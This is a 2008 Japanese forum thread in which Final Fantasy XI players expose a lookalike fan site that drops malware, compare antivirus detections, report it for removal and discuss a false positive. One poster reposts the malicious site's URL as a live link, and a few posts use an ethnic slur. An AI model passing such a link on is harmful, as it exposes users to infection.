つまりseedsは偽装HPてことかね


530 名前:既にその名前は使われています:2008/09/17(水) 04:46:18 ID:5AzQPvbp
一応元のもここのも削除依頼してきた
こんなんで削除してくれるのかしらないけど

531 名前:既にその名前は使われています:2008/09/17(水) 04:50:46 ID:5N8y1SS0
>>526
踏んだの512のリンクのやつね
avastだと逃してるのあるのか・・

532 名前:既にその名前は使われています:2008/09/17(水) 04:54:13 ID:rkqJGY7W
今seed(本物)とseeds(偽者)のindex.htmを比較してみたけど、完全に偽サイトだね。

リンク先とかは偽者から本物のデータを参照するようにしてるから、
本家が更新されたら偽者も一緒に更新されるっていう・・・。

533 名前:既にその名前は使われています:2008/09/17(水) 04:55:37 ID:vl3qytsv
ogame:ネトゲ実況[レス削除]
http://qb5.2ch.net/test/read.cgi/saku/1161186446/l50
重要削除のほうじゃなくてこっちだね
ウイルスサイトへのリンクの削除は

534 名前:既にその名前は使われています:2008/09/17(水) 04:57:10 ID:RNuwTKwE
カードとかの番号引き出す成り済ましサイトと同じ要領だな

サイトアドバイザーとか入れてると少しはましかね

535 名前:既にその名前は使われています:2008/09/17(水) 04:57:27 ID:rkqJGY7W
削除依頼もだけど、元の書き込みした奴が犯罪者なのは明白だよね。警察に捜査依頼すべき?

536 名前:既にその名前は使われています:2008/09/17(水) 04:58:32 ID:uz4igdJy
>>532
手が込んでるね…

537 名前:既にその名前は使われています:2008/09/17(水) 04:58:53 ID:ZA1hWmTn
>>531
ありがとうございます

どうやら偽者サイトのようですね
これ、ジオに削除依頼を出しておいたほうがいいでしょうか
というか、どなたか出されました?

538 名前:既にその名前は使われています:2008/09/17(水) 05:00:08 ID:vl3qytsv
>>535
しておいたほうがいいかもね〜

どうでもいい話なんだが
ウイルスサイトアドレスを唐突に書き込むやつって、大抵串使ってるからbooに突っ込んで食ってるんだけど
>>512で出てたやつ突っ込んでみたが串じゃない返答だったw

539 名前:既にその名前は使われています:2008/09/17(水) 05:00:28 ID:RNuwTKwE
夏休みぐらいに自分が引っかかったからて色々なスレにアド貼り付けてたアホがいたな

まあ、サイバー(ryに通報しとけば厨房か業者か知らんが足がつくかもね

540 名前:既にその名前は使われています:2008/09/17(水) 05:00:34 ID:wHdZjOl6
geocities.jpに削除依頼した方がいいのかもね

541 名前:既にその名前は使われています:2008/09/17(水) 05:00:41 ID:5AzQPvbp
>>533
d
そっちにも依頼しておいた

>>537
出してない

542 名前:既にその名前は使われています:2008/09/17(水) 05:03:19 ID:rkqJGY7W
ちなみに、/seedsの判定は
McAfee SiteAdviser → 安全表示
Google Safe Browsing API → 安全表示
Finjan → 怪しい表示
Norton → (Windows版しかないから怖くて試せない)

マカフィーせめて「不明」と出せよなw
ちなみにFinjanは経験的に怪しいサイトはほぼ怪しいとでるが、普通のメジャーなサイトも
怪しいと出ることが多い。日本のIT Mediaとか。

543 名前:既にその名前は使われています:2008/09/17(水) 05:04:59 ID:ZA1hWmTn
>>542
参考になるかどうかわかりませんけど、侵入検知で弾いたわたしの
ソフトは、NIS2008でした

544 名前:既にその名前は使われています:2008/09/17(水) 05:19:12 ID:ZA1hWmTn
ジオ、どこに連絡すればいいのかわかんない・・・
こういうことはわかりやすいところに連絡先を書いておいて欲しいな・・・

545 名前:既にその名前は使われています:2008/09/17(水) 05:28:17 ID:EVmfXFVx
ttp://help.yahoo.co.jp/help/jp/geo/abuse/abuse-06.html

ここでいいんじゃないかな>連絡先

546 名前:既にその名前は使われています:2008/09/17(水) 05:28:33 ID:bB1v+35I
seedsの方は検索してもトップには出てこないな
最近栽培関連のスレ伸びてたから心配だ
と言うか、どこからそのサイトを見つけてきたの?

547 名前:既にその名前は使われています:2008/09/17(水) 05:31:43 ID:EVmfXFVx
12. 他人になりすましてサイトを立ち上げること、または他人が立ち上げているサイトを模倣したサイトを掲載すること
13. ページに接続したコンピュータやネットワークに損害を与える行為
( これには以下のものが含まれますが、この限りではありません)
・ ブラウザ・クラッシャーの設置
・ ウイルスやワームプログラム、またはプログラムコードの公開
・ ウイルスやワームプログラムに感染したファイルを故意に設置すること



思いっ切りジオシティーズガイドラインに触れてるから、まあ対処してくれるんじゃないかな

548 名前:既にその名前は使われています:2008/09/17(水) 05:32:21 ID:5AzQPvbp
>>544
http://help.yahoo.co.jp/help/jp/common/common-07.html
ここで報告しておいた

549 名前:既にその名前は使われています:2008/09/17(水) 05:38:46 ID:ZA1hWmTn
>>545
>>548
ありがとうございます
とりあえずわたしも通報を入れておきました

さて・・・

攻撃を弾いたので大丈夫だとは思うけど、とりあえずスキャンしておこう・・・

550 名前:既にその名前は使われています:2008/09/17(水) 05:47:08 ID:5AzQPvbp
礼には及ばん
俺の場合は身から出た錆っつーのもあるからw

551 名前:既にその名前は使われています:2008/09/17(水) 05:49:10 ID:nEIJ3oAB


91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園 
http://www.geocities.jp/ff11seeds/index.html

552 名前:既にその名前は使われています:2008/09/17(水) 05:51:06 ID:fNtF/dEP
<<551
死ね

553 名前:既にその名前は使われています:2008/09/17(水) 05:51:44 ID:3ec2gQpW
>>551
これなに?踏んだらまずい?

554 名前:既にその名前は使われています:2008/09/17(水) 05:52:23 ID:EVmfXFVx
ちょっと上のレスくらい読みなさい

555 名前:既にその名前は使われています:2008/09/17(水) 05:57:47 ID:ZA1hWmTn
※※注意喚起※※

「FF11ヴァナ・ディール菜園」に本物そっくりの偽物サイトがあります

本物のURL = ttp://www●geocities.jp/ff11seed/
偽物のURL = ttp://www●geocities.jp/ff11seeds/

偽物はseedに「s」が付いてます

ジオには削除依頼を出していますが、偽物を踏むとウィルスが落ちてきますので
くれぐれも踏まないように注意してください

556 名前:既にその名前は使われています:2008/09/17(水) 06:00:09 ID:3ec2gQpW
何のウイルスかは分からんのですか

557 名前:既にその名前は使われています:2008/09/17(水) 06:03:11 ID:ZA1hWmTn
>>556

>>521 :既にその名前は使われています:2008/09/17(水) 04:26:27 ID:5N8y1SS0
菜園踏んだらavastが2種類叫んだよ

VBS:Malware-gen
ウイルス/ワーム
080915-0, 2008/09/15

JS:Agent-AU [Expl]
Exploit
080915-0, 2008/09/15

だそうです

558 名前:既にその名前は使われています:2008/09/17(水) 06:03:36 ID:vl3qytsv
だからおまいさんはスレの少し上を嫁と

559 名前:既にその名前は使われています:2008/09/17(水) 06:04:03 ID:S1GzY0IC
おいおい・・・なんつー物騒な世の中じゃ・・・・
もうhttp自体NGワードに指定しときました

560 名前:既にその名前は使われています:2008/09/17(水) 07:34:49 ID:E6cr+M/r
seedsの方、踏んでみたらノートン先生が反応
HTTP Yahoo! Messenger CYFT Ctrl Get File

561 名前:既にその名前は使われています:2008/09/17(水) 08:08:38 ID:NxcPsFYg
>>555
罠サイトのほう、カスペじゃ検知できないように作られてる?
アーガスのカスペのマルウェアチェック素通りしてる。

562 名前:既にその名前は使われています:2008/09/17(水) 08:45:20 ID:mXLU/bDL
メンテ明け早々に差出人不明でHugecheap.comのメッセ来てるわ
気持ちわりいなこれ

563 名前:既にその名前は使われています:2008/09/17(水) 09:00:06 ID:4n8eurLN
あーこれは酷いな、最低だ

564 名前:既にその名前は使われています:2008/09/17(水) 09:04:19 ID:Za+zLKJg
AVG先生とアーガスじゃ反応しないな
注意しておけよ〜

565 名前:既にその名前は使われています:2008/09/17(水) 09:10:24 ID:tS7jQV/9
RealPlayerの脆弱性関係?

ところでAntiVirはどうだい?

566 名前:既にその名前は使われています:2008/09/17(水) 09:49:35 ID:P61R2rp9
Seeds/の方、ウィルスバスター2009が反応しました。
HTML_IFRAME.ATW
というウィルスが隔離されていました。

567 名前:既にその名前は使われています:2008/09/17(水) 09:54:41 ID:biOYpArr
敵のシナチクは、日本語完璧に理解してるぽいな。
やはり、日本の国費留学生かw

568 名前:既にその名前は使われています:2008/09/17(水) 10:10:05 ID:VIFUJp1C
http://www.mozilla.gr.jp/
ただし、Firefox 3.0.2(9/16リリース予定)において、いくつかの大きな修正 がされているため、
Firefox 2 から 3 へ更新される際は充分検討の上アップデートされますようお願いいたします。

まだVUこないな・・・
■と違ってちゃんとテストしてるからいい加減なものは出せないんだろうけど。

569 名前:既にその名前は使われています:2008/09/17(水) 10:14:47 ID:RNuwTKwE
>>567
都会にある中華の学校なら日、中、英は必須科目だ
進学校なら5ヶ国語とかもあるんだぜ



570 名前:既にその名前は使われています:2008/09/17(水) 12:06:53 ID:DKjjIGt3
age

571 名前:既にその名前は使われています:2008/09/17(水) 12:26:44 ID:3A7DVg5e
>>568
3.0.2来るとはしらなんだ・・・

572 名前:既にその名前は使われています:2008/09/17(水) 13:38:16 ID:WSc1nFwt
206からあげ

Seeds/って、スクリプトを完全に不許可にしてたのに
攻撃してきたっていうのは、どんな理屈なんでしょ

573 名前:既にその名前は使われています:2008/09/17(水) 14:17:03 ID:iWqWkJQT
3.02は延期らしいよ来週か?

574 名前:既にその名前は使われています:2008/09/17(水) 14:52:21 ID:i/HJEyPo
>>572
流行ってる手口がスクリプト注入だっただけで、全部のウイルスがスクリプト使用というわけではない

575 名前:既にその名前は使われています:2008/09/17(水) 15:11:08 ID:x3044V7i
>>555
もう削除されとる。

576 名前:既にその名前は使われています:2008/09/17(水) 15:18:11 ID:tS7jQV/9
おお 対応早いな

577 名前:既にその名前は使われています:2008/09/17(水) 15:39:26 ID:/jSkJ7SD
つーかネット危険すぎ…

578 名前:既にその名前は使われています:2008/09/17(水) 15:56:41 ID:1MDU8Pso
582 既にその名前は使われています New! 2008/09/17(水) 13:08:09 ID:0j//Rtx7
Pokoのサイト ウイルス感染してないか?
カスペル反応して駆除したんだが。
Bakdoor.Win32.Agent.rqkって出たんだが。

583 既にその名前は使われています sage New! 2008/09/17(水) 13:32:04 ID:aJnuHXDD
感染というか、管理人が仕込んでるようにしか見えないんだが・・・
バックドアの送信先見れば分かるよ
ポコポコがハックしてるのか?


ttp://ameblo●jp/pokostyle/

バハスレより
うちじゃ反応しないんだがどうかな

579 名前:既にその名前は使われています:2008/09/17(水) 16:01:35 ID:ttCyA7Sc
俺のとこにも差出人空白のRMT宣伝ぽいメッセきたぞ
なんなんだこれは

580 名前:既にその名前は使われています:2008/09/17(水) 17:22:17 ID:x3044V7i
>>578
有害なコードは見当たらんね。
除去されたのか、偽ページが別にあるのか。

581 名前:既にその名前は使われています:2008/09/17(水) 17:35:27 ID:qTU/xbzG
>>578
俺昼過ぎにそこ見たけど何もなかったぞ
そもそもamebloのタグエディタにそんなもんは仕込めんと思うんだが・・・

582 名前:既にその名前は使われています:2008/09/17(水) 17:45:57 ID:P7jf/yC4
何か食わされてるか心配になって調べてみたが
書き込みにある Backdoor.Win32.Agent.rqk ってカスペもトレンドマイクロもデータベースにないね
ググッても該当なし

583 名前:既にその名前は使われています:2008/09/17(水) 17:49:05 ID:apDiCTi6
今ってヴァナモンとかAH(競売オンライン)とか安全なの?
怖くて最近みてないんだけど・・・

584 名前:既にその名前は使われています:2008/09/17(水) 17:51:47 ID:GH1yHG71
スレ住人:今安全だよ^^

その後罠が仕掛けられる

>>583:ハックされた!おまえらのせいだ!

585 名前:既にその名前は使われています:2008/09/17(水) 18:11:23 ID:/jSkJ7SD
>v<;

586 名前:既にその名前は使われています:2008/09/17(水) 18:19:34 ID:i/HJEyPo
もう何を見るのも自己責任としか言えないな

587 名前:既にその名前は使われています:2008/09/17(水) 18:40:41 ID:x3044V7i
昔からそうなんだけどね。

588 名前:既にその名前は使われています:2008/09/17(水) 18:54:09 ID:xnK/nMZC
Bakdoor.Win32.Agent.rqkで
ヤホってみたら135件だったけどな
中途半端なカキコせず詳しく書けチンカス

589 名前:既にその名前は使われています:2008/09/17(水) 18:54:50 ID:xnK/nMZC
て誤爆しつれいw

590 名前:既にその名前は使われています:2008/09/17(水) 19:13:40 ID:Ze2uf3yX
SSD関連で調べていて行きついたのだけど、Enhanced Write Filter(EWF)を導入することで、OS起動後の変更を
ユーザーが任意でコミットするかどうかを選択できる環境が構築できそう。
クリーンな環境を構築した上で導入すれば、ネカフェもどきのセキュリティが個人でも得られるのではないだろうか。

591 名前:既にその名前は使われています:2008/09/17(水) 19:38:04 ID:nuXmB1Xd
>>581
調べてきた
詳しく情報が出てこないなら捏造の可能性があるね

アメブロ禁止タグガイド

アメブロ禁止タグ一覧
・html ・head ・body ・frame ・frameset ・iframe ・object ・param ・server
・javascript ・form ・input ・embed ・textarea ・script

これじゃ仕込みようがないと思う
アメブロが被害出てないのはこういう事じゃないかな

592 名前:既にその名前は使われています:2008/09/17(水) 19:39:32 ID:RGGXIHt9
geocities.jpをOpenDnsで弾いてる俺は勝ち組


593 名前:既にその名前は使われています:2008/09/17(水) 20:01:51 ID:WSc1nFwt
>>588
単語の羅列に反応して出てくるだけの情報は情報とは言えません
無意味に検査しただけではだめですよ

Backdoor.Win32.Agent.rqk 

Backdoor.Win32.Agentの亜種には違いないとは思うのですけど
データベースへの登録はなさそうですねぇ

594 名前:既にその名前は使われています:2008/09/17(水) 20:05:54 ID:WSc1nFwt
Backdoor.Win32.Agent.ce (AVP)
Backdoor.Win32.Agent.aox (Kaspersky)

関連っぽいのはこのあたりかなぁ・・・
実はわたしのところにもいっぴきいるので、いま必死で情報探してます

595 名前:既にその名前は使われています:2008/09/17(水) 20:10:21 ID:yy2HO+Y2
>>542
Googleでアド貼ってチェックしてない?
Googleだとあいまいマッチで本家が出てきて「安全」だけど、
SiteAdvisorサイトでURLチェックしたら「不明」になってたよ。

マカ(SiteAdvisor)に精査依頼と、ウィルスサイトとして投稿しておいた。

596 名前:既にその名前は使われています:2008/09/17(水) 20:40:04 ID:nEIJ3oAB
91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
サイト:FF11 
http://miku.xrea.jp/template/

597 名前:既にその名前は使われています:2008/09/17(水) 20:46:46 ID:mRgroZqM
いつから罠サイト転載スレになったんだよw

598 名前:既にその名前は使われています:2008/09/17(水) 20:49:33 ID:WSc1nFwt
>>596
なにがしたいですか?

わざわざxreaのほうを貼らなくてもテンプレに書いてある
ttp://www.geocities.jp/ff11warning/template/を貼れば
いいじゃないですか

599 名前:既にその名前は使われています:2008/09/17(水) 20:53:24 ID:wmUlENg2
沈静化してきたと思ったら大間違いだったな

600 名前:既にその名前は使われています:2008/09/17(水) 21:24:33 ID:Qw+KYy3F
とりあえず>>596

>>551の引用元の本文(危険URIは省いとく)

91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園

の頭の「栽培」と後ろの「ヴァナ・ディール菜園」を消してアドをFFXI WARNINGさんとこのアドレスに書き換えてるだけ。
つーか同じヤツが書き込んでるしなあ。
ホント何したいんかわからんわ。

601 名前:既にその名前は使われています:2008/09/17(水) 21:37:56 ID:fpNeVmNw
NoScript1.8.1.2来てる?DLかなんかでエラー出るけど

602 名前:既にその名前は使われています:2008/09/17(水) 21:40:24 ID:AAyVqiRo
>>601
ほんとだ。自分もエラーが出た

603 名前:既にその名前は使われています:2008/09/17(水) 22:13:48 ID:3h97Nqg9
おれはDLできたが

604 名前:既にその名前は使われています:2008/09/17(水) 22:57:21 ID:nEIJ3oAB
2ちゃんねるで垢ハック注意喚起スレ → 逆効果だったりする場合もあり

セキュリティで固めたぜイエイ! → 相互作用バージョンアップも手こずって

http://www.jp.playstation.com/hardware/ps2/scph50000mbnh.html

605 名前:既にその名前は使われています:2008/09/17(水) 23:02:17 ID:fpNeVmNw
>>604
ID変えてから出直しておいで

606 名前:既にその名前は使われています:2008/09/17(水) 23:03:47 ID:WSc1nFwt
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.2 アップデート (←問題なくアップできました)

607 名前:606:2008/09/17(水) 23:05:52 ID:WSc1nFwt
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.1.2 アップデート

 1.8.「1.」2 でしたm(_ _)m



608 名前:お知らせとお願い:2008/09/17(水) 23:31:30 ID:quvTp1xk
現在多忙で更新できない上にお騒がせしているmiku.xrea.jp昨日の生ログ
84.103.142.61.broad.zs.gd.dynamic.163data.com.cn - - [16/Sep/2008:18:06:10 +0900] "
GET / HTTP/1.1" 302 238
"http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=1039045744&start=20&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

1039045744で検索してきやがりました。注意を呼びかけているサイトが軒並み引っかかります。
:88が割と不振で原因調査してるんだったら、ざまぁなんですけどねw
とにかく163data.com.cnの攻撃再開にご注意ください。

>>595
SiteAdvisorは、以前の番地みたいなほうは安全認定でてるとこもあるけど
現行のwww.geocities.jp/userになってから全部グレーゾーンじゃなかったかなぁ。
サブドメインも一まとめに認定してたと思います。
(miku.xrea.jpもxrea.jpとしての扱いですし)

</seedsについてお願い>
スレを読んだ感じだとサーバ内にドロッパ設置してたようですが
状況把握できた方いらっしゃいませんでしょうか?
もしくは/seedsの魚拓とかファイルDLしてお持ちの方いらしたら
お手数ですがレスもしくはご連絡いただけるとすごく喜びます。

609 名前:既にその名前は使われています:2008/09/17(水) 23:39:37 ID:Qw+KYy3F
>>604
なんだ>>5の惰弱性君だったのか

610 名前:既にその名前は使われています:2008/09/18(木) 00:21:34 ID:0WcOk/15
>>608
ソースは保存してありますけど、それでいいのかな

611 名前:既にその名前は使われています:2008/09/18(木) 00:47:18 ID:0WcOk/15
>>608
参考にはならないかもしれませんけど

HTTP Yahoo! Messenger CYTF Ctrl GetFile

↑NIS2008が遮断した 202●93.87.154:80 からの侵入の試みです

そのときに落ちてきたと思われるのが Backdoor.Win32.Agent.rqk

感染したのはハンゲのスターターらしいのですけど、それ、スキャンで
引っかかるのにそのフォルダ(Downloaded Program Files)に探しに行くと
いないんですよね(隠しとかはぜんぶ表示させるようにしてあります)
何回か試してみて、どうしても探せないのでそのまま削除しちゃいました

Backdoor.Win32.Agent の亜種だと思うのですけど、スクリプト以外だと
IRCコマンドの実行とかになるのでしょうか

612 名前:既にその名前は使われています:2008/09/18(木) 00:59:47 ID:Ymi7TbYB
おやすみ前のあげ。

613 名前:既にその名前は使われています:2008/09/18(木) 01:10:51 ID:JaBgULd1
最近ビビって毎日完全スキャンしてるんだけど(感染してからじゃ遅いのはわかってるけど)
あんまやりすぎるとHDDいかれちゃうかな?

614 名前:既にその名前は使われています:2008/09/18(木) 01:41:46 ID:D8au9qIA
アメブロ、あの自由度の低さが敷居を上げていたわけか… 


615 名前:既にその名前は使われています:2008/09/18(木) 02:14:14 ID:iFkCwsfx
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.1.3 アップデート

616 名前:既にその名前は使われています:2008/09/18(木) 02:16:23 ID:0WcOk/15
>>615
ありがとうございます

617 名前:既にその名前は使われています:2008/09/18(木) 03:14:30 ID:VJiokB+D
とりあえずnEIJ3oABをサイバーの方と運営に通報してきた
愉快犯はガクブルって家族に迷惑かけて泣け

618 名前:既にその名前は使われています:2008/09/18(木) 08:13:15 ID:39T3gO+s
250まで下がってた

619 名前:既にその名前は使われています:2008/09/18(木) 09:44:08 ID:7WpJbkU3
>>615
ありがとう。
あれ、でも昨日アップデートしたと思ったんだけどなぁ。また更新されたのか。とりあえず更新しました。


620 名前:既にその名前は使われています:2008/09/18(木) 10:59:26 ID:yq/n/Tbz
>>617
通報支援age

621 名前:既にその名前は使われています:2008/09/18(木) 11:22:37 ID:IrkBb8P2
罠サイト張ってる奴、またODNじゃねぇだろうな・・・
もう規制は勘弁してくれよ

622 名前:既にその名前は使われています:2008/09/18(木) 11:31:32 ID:oQ7YRFQA
>>619
このところ立て続けにヴぁーじょんが上がってるよ

623 名前:既にその名前は使われています:2008/09/18(木) 12:14:07 ID:YG/JF+kY
その変換やめる気はにいのか?;

624 名前:既にその名前は使われています:2008/09/18(木) 13:35:57 ID:gZFmwDAS


625 名前:既にその名前は使われています:2008/09/18(木) 13:56:56 ID:OdWuvaEr
ヴぁあああああああんが1ヴぁああああああああああん

626 名前:既にその名前は使われています:2008/09/18(木) 14:09:13 ID:phQUrscp
報告スレ落ちてるのでここに報告させてもらうね
被害確認7/13
サポセンチャットで相談不正アクセス調査依頼
7月終わりごろ
不正アクセス調査結果来たのが9/11だったかな
んでパス復旧してもらって先週末にすぐ復旧依頼送った
んでさっきインしたら巻き戻っていた
ペンギン村住人だったので特殊な例ってことで

おかえりなさい2500万G

627 名前:既にその名前は使われています:2008/09/18(木) 14:09:55 ID:phQUrscp
あ、ちなみに依頼送ってから復旧の間凍結なし
いきなり巻き戻ってた

628 名前:既にその名前は使われています:2008/09/18(木) 15:13:46 ID:7/OQP30H
>>626ー627
全て慨出。
住所が異世界で〜の理由もすでに過去スレで語られた。

てか、迷惑住所書いて、回りに迷惑かけた自分を先に反省してくれい。
そんな迷惑事を意気揚々と報告されて、マネされるとさらに面倒にしかならん。
あ、保守ありがとね〜

629 名前:既にその名前は使われています:2008/09/18(木) 15:24:28 ID:H8weWlm/
NoScriptがまたVer.UPしている age

630 名前:既にその名前は使われています:2008/09/18(木) 15:35:12 ID:hTnSTPcP
>>628
迷惑ってwハックした垢使い続けたい業者ですか?w
回りってスクエニのこと?w
つか何いきがってんの?wイミフw


631 名前:既にその名前は使われています:2008/09/18(木) 15:45:44 ID:spUyaCr5
何だこいつ

632 名前:既にその名前は使われています:2008/09/18(木) 15:50:55 ID:CzJCiZoR
シナチクだろ

633 名前:既にその名前は使われています:2008/09/18(木) 16:13:10 ID:1TWH+eNv
文字通りナメック星人だろ
前にも大暴れしてた子

634 名前:既にその名前は使われています:2008/09/18(木) 16:23:40 ID:qTfAlswk
>>611
先ほど自分もカスペルでスキャンしたら発見して削除しました。
Backdoor.Win32.Agent.rqk
c:\windows\downloaded program files\hgstartjp25.exe
見つかったのは同じくハンゲのスターターのようですね

635 名前:既にその名前は使われています:2008/09/18(木) 17:08:44 ID:KtVGyTks
誤検知だね。報告しといた。

636 名前:既にその名前は使われています:2008/09/18(木) 17:17:36 ID:KtVGyTks
ちなみに検出名は >>578 >>582 ね。

637 名前:既にその名前は使われています:2008/09/18(木) 17:35:03 ID:bX+SbjLp
seedsサイトの問題とカスペルスキーの誤検出が偶然に重なっただけかぁ
かなり慌てちゃった・・・

638 名前:既にその名前は使われています:2008/09/18(木) 17:50:11 ID:gdBAHbNr
Downloaded Program FilesフォルダとかContent.IE5フォルダってアドレスバーに直打ちしないと出てこないよねw

639 名前:既にその名前は使われています:2008/09/18(木) 17:56:35 ID:bX+SbjLp
>>638
Explorerの表示設定だと思いますよ

「ツール→フォルダオプション→表示タブ→ファイルとフォルダの表示」で
「すべてのファイルとフォルダを表示する」を選択
同じく「保護されたオペレーティングシステムファイルを表示しない(推奨)」の
チェックを外す

これしてみると、普通にExplorerで見ることできます

640 名前:既にその名前は使われています:2008/09/18(木) 18:06:50 ID:KtVGyTks
返答あり。
HgStartJp25.exe
We are sorry, it is false alarm. It will be fixed as soon as possible. Thank you for your help.
すぐ直すそうだ。

641 名前:既にその名前は使われています:2008/09/18(木) 18:33:17 ID:emcJszXN
>>639
いや、その設定してもなお、表示されないフォルダだよ。
少なくともXPまではね。Vistaは持ってないから知らないが。

アドレスバー直打ちすればアクセス可能だけどね。

642 名前:既にその名前は使われています:2008/09/18(木) 18:47:56 ID:rMuKVct8
>>641
Explorerの表示設定すら弄れないようじゃ、アンタのPCはウィルスだらけだろうな

643 名前:既にその名前は使われています:2008/09/18(木) 19:54:40 ID:bX+SbjLp
>>641
見えますよ、XPですけど・・・w

644 名前:既にその名前は使われています:2008/09/18(木) 20:14:00 ID:x9jqs78J
>>641
どんだけウィルス入ってるか楽しみだなw
ハックは今週末か来週末ですな
早めにPS2でパス変更を

645 名前:既にその名前は使われています:2008/09/18(木) 20:14:33 ID:/H3RM02n
>>641の人気にsit

646 名前:既にその名前は使われています:2008/09/18(木) 20:20:00 ID:bX+SbjLp
>>641
ひょっとしたら管理者権限でログオンしてないと隠しは見られないのかなと
思って試してみましたけど、制限ユーザーでも隠しファイルやフォルダは
見ることができました
くどいですけど、システムはWindows XP(SP3)です
本当に見られないとすれば、なにか壊れてる可能性ありますよ

647 名前:既にその名前は使われています:2008/09/18(木) 20:45:14 ID:n2rN/cSy
Downloaded Program Filesフォルダは見えるが、Content.IE5フォルダは見えないな・・・
ってか、ずっとアルファベット順に並んでると思ったフォルダが
Downloaded Program Filesといくつかはちょっと離れたところにあったんで見落としてたわ

自分の場合、Temporary Internet Filesはデフォルトの場所から移動させてあるんだが、
デフォルトの位置にはContent.IE5フォルダが見える、隠し属性になってて半透明。
(C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files)
で、実際使ってる方の場所のContent.IE5フォルダはやはり見えない。
(自分の場合はE:\tmp\Temporary Internet Files)
E:\tmp\Temporary Internet Files\Content.IE5ってアドレスバーに入れれば見える。
そうすると、英数8文字の謎のフォルダ4つと、index.dat、desktop.iniがある。


この、index.datが、どんどん大きくなっても削除できなくて困ってるw

648 名前:既にその名前は使われています:2008/09/18(木) 20:57:58 ID:VaXIgqcP
>>641ちゃんの反論マダー?

649 名前:既にその名前は使われています:2008/09/18(木) 21:13:28 ID:n2rN/cSy
すまんwww俺641wwwww

650 名前:既にその名前は使われています:2008/09/18(木) 21:16:41 ID:x9jqs78J
謎の8文字のフォルダはカタカナにして全部並べて後ろから読むと謎が解けるってコナン君が言ってた


651 名前:既にその名前は使われています:2008/09/18(木) 21:26:51 ID:bX+SbjLp
>>647
半透明のはダブルクリックすれば中身開きますよ

652 名前:既にその名前は使われています:2008/09/18(木) 21:35:58 ID:bX+SbjLp
>>647
Content.IE5はいくつかあっちこっちにありますけど(環境の違い)
Temporary Internet Filesに半透明に出てきたものをExplorerから
ダブルクリックで開けます

653 名前:既にその名前は使われています:2008/09/18(木) 21:50:34 ID:Smegs5c4
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(前編) (1/2)
- ITmedia +D Games <http://plusd.itmedia.co.jp/games/articles/0809/18/news077.html>

今更ながらの注意喚起記事

654 名前:既にその名前は使われています:2008/09/18(木) 21:52:16 ID:5OtzvxF/
で、1ヶ月以上かかるのか?巻き戻し

655 名前:既にその名前は使われています:2008/09/18(木) 22:31:05 ID:x9jqs78J
>>654
2週間ほどっす

656 名前:既にその名前は使われています:2008/09/18(木) 22:51:54 ID:vKiovuhn
キャッシュポイズニングの脆弱性あるDNSサーバー、まだ多数存在
http://internet.watch.impress.co.jp/cda/news/2008/09/18/20899.html

657 名前:既にその名前は使われています:2008/09/18(木) 23:03:55 ID:WKqwSfR1
OpenDnsでOk

658 名前:既にその名前は使われています:2008/09/18(木) 23:57:59 ID:0kxjDIfu
メールアイコンが点滅してたんでPOLいって見てきた
MMORPGの通貨安く売りますだのPLしますだのRMT関連の英語のメールだったorz
@pol.comに無差別送信だろうか、これ

659 名前:既にその名前は使われています:2008/09/19(金) 00:24:48 ID:EKXtzkUl
245からあげ

660 名前:既にその名前は使われています:2008/09/19(金) 01:19:35 ID:hAysWqou
>>658
フレンドメッセージじゃなくて?

まぁ、フレメッセ送れるくらいならPOLのメールも送りたい放題だろうけど

661 名前:既にその名前は使われています:2008/09/19(金) 03:03:00 ID:EKXtzkUl
220からあげ

662 名前:既にその名前は使われています:2008/09/19(金) 03:41:02 ID:K2fmtKdb
ヴァナモン行ったら、ファイルのダウンロードをブロックしました【北】

最近見に行っても、真っ白なページか、数頁見ると真っ白なページになる。
なんだこれ

663 名前:既にその名前は使われています:2008/09/19(金) 04:04:28 ID:LvnTVfEM
>>662
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.vanamon.com%2F&x=75&y=13
移転した後も、XREAだったのか。orz・・・

664 名前:既にその名前は使われています:2008/09/19(金) 04:07:38 ID:9kt5zO5B
URLチェッカーで覗いたけど、ループタグないのgzipがわけわからん

665 名前:既にその名前は使われています:2008/09/19(金) 04:09:51 ID:9kt5zO5B
お、インラインフレームタグないのわけワカラン糞長いスクリプト消されたっぽいな
対応はええええ

666 名前:既にその名前は使われています:2008/09/19(金) 04:10:20 ID:9kt5zO5B
ごめん、消えてなかった
気のせいだった

667 名前:既にその名前は使われています:2008/09/19(金) 04:15:47 ID:9kt5zO5B
ワカランからプロに任せるわ

668 名前:既にその名前は使われています:2008/09/19(金) 04:36:04 ID:LSrKdL7K
aguseのスクリーンショットでは普通に見えるけど、Gatewayで行って見ると真っ白だね。何故?

669 名前:既にその名前は使われています:2008/09/19(金) 04:45:37 ID:EKXtzkUl
ソースチェッカーもxreaかぁ・・・
弾いてるから使えないなぁ・・・

670 名前:既にその名前は使われています:2008/09/19(金) 04:50:52 ID:qPpkoj2a
>>658
アドレスはばれたってことだな。
デフォルトだとIDとの関連もばれるのだろうか?
最近はパスをランダムでブルートフォースとか書いてあっ

671 名前:既にその名前は使われています:2008/09/19(金) 04:57:27 ID:PAowZ65u
W32/Rontokbro@mmとかそんな感じのがでてきた
これは垢ハック系なのかな?

672 名前:既にその名前は使われています:2008/09/19(金) 05:15:17 ID:zU/SY8Nf
ぐぐるとすぐ出てきたけど
システムを不安定にする大量メール送信ワームだな

673 名前:既にその名前は使われています:2008/09/19(金) 05:33:58 ID:PAowZ65u
そうなんだ
じゃあゲームの方はとりあえず心配ないみたいだね
一応削除はしておくけど・・・

674 名前:既にその名前は使われています:2008/09/19(金) 07:02:37 ID:JxCSphnP
俺が2CH書き込みに使ってるサイトがゼリアでした!

675 名前:既にその名前は使われています:2008/09/19(金) 09:14:25 ID:XLIB9MoQ
「IT製品、ソースコード開示せよ」…中国が外国企業に要求へ
http://www.yomiuri.co.jp/atmoney/news/20080919-OYT1T00011.htm?from=main2

